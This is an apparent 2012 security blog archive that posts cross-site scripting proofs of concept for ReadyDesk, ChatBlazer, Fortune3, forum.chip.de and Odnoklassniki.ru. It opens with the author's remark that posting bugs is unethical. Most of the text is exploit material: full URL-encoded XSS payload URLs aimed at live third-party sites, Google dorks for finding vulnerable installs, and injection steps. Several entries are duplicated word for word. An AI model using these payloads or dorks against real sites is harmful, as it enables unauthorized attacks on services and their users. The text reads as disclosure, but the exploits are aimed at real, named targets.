Reason?
I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.
I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.
vineri, 20 aprilie 2012
joi, 19 aprilie 2012
ReadyDesk Cross Site Scripting
# Exploit Title: ReadyDesk Cross Site Scripting
# Date: 19.04.2012
# Author: Sony
# Software Link: http://www.readydesk.com/
# Google Dorks: powered by readydesk
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/readydesk-cross-site-scripting.html
..................................................................
Well, we have persistent xss in the "View Existing Tickets".
We can use Demo:
http://www.readydesk.com/demo.asp
http://www.readydesk.com/rd7/customer/rdlogin.aspx (Customer Interface)
But first --> Submit New Ticket (with our xss code). (i think all fields in the send form)
# Date: 19.04.2012
# Author: Sony
# Software Link: http://www.readydesk.com/
# Google Dorks: powered by readydesk
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/readydesk-cross-site-scripting.html
..................................................................
Well, we have persistent xss in the "View Existing Tickets".
We can use Demo:
http://www.readydesk.com/demo.asp
http://www.readydesk.com/rd7/customer/rdlogin.aspx (Customer Interface)
But first --> Submit New Ticket (with our xss code). (i think all fields in the send form)
ChatBlazer Flash Chat Cross Site Scripting
# Exploit Title: ChatBlazer Flash Chat Cross Site Scripting
# Date: 19.04.2012
# Author: Sony
# Software Link: www.chatblazer.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html
.................................................................
Well, we have cross site scripting in ChatBlazer.
We can use Demo. (simple example)
http://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0
# Date: 19.04.2012
# Author: Sony
# Software Link: www.chatblazer.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html
.................................................................
Well, we have cross site scripting in ChatBlazer.
We can use Demo. (simple example)
http://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0
miercuri, 18 aprilie 2012
Fortune3 Cross Site Scripting
# Exploit Title: Fortune3 Cross Site Scripting
# Date: 18.04.2012
# Author: Sony
# Software Link: http://www.fortune3.com/
# Google Dorks: Powered by FORTUNE3
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/fortune3-cross-site-scripting.html
..................................................................
Well, we have some xss in Fortune3.
Our test with http://www.naturalab.com (simple example)
Add to cart - product what you want and open page Print Cart or Email Cart.
Print Cart and Email Cart:
Put our xss code in "Include a Note" and press button Continue.
# Date: 18.04.2012
# Author: Sony
# Software Link: http://www.fortune3.com/
# Google Dorks: Powered by FORTUNE3
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/fortune3-cross-site-scripting.html
..................................................................
Well, we have some xss in Fortune3.
Our test with http://www.naturalab.com (simple example)
Add to cart - product what you want and open page Print Cart or Email Cart.
Print Cart and Email Cart:
Put our xss code in "Include a Note" and press button Continue.
marți, 17 aprilie 2012
luni, 16 aprilie 2012
forum.chip.de xss
http://codepad.org/2r8vW8DM
or
http://forum.chip.de/newthread.php?do=newthread&f=155%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E
O_o
or
http://forum.chip.de/grafikkarten/?daysprune=-1%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&order=desc&sort=views
%)
or
http://forum.chip.de/newthread.php?do=newthread&f=155%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E
O_o
http://forum.chip.de/grafikkarten/?daysprune=-1%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&order=desc&sort=views
%)
duminică, 15 aprilie 2012
Odnoklassniki.ru Cross Site Scripting
# Date: 15.04.2012 # Author: Sony and Flexxpoint # Web Browser : Mozilla Firefox # Sony Blog: http://st2tea.blogspot.com # Flexxpoint Blog: http://flexxpoint.blogspot.com/
# PoC:
http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html
..................................................................
Well, we have a cross site scripting on Odnoklassniki.ru
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
or
http://codepad.org/kKjrrn76
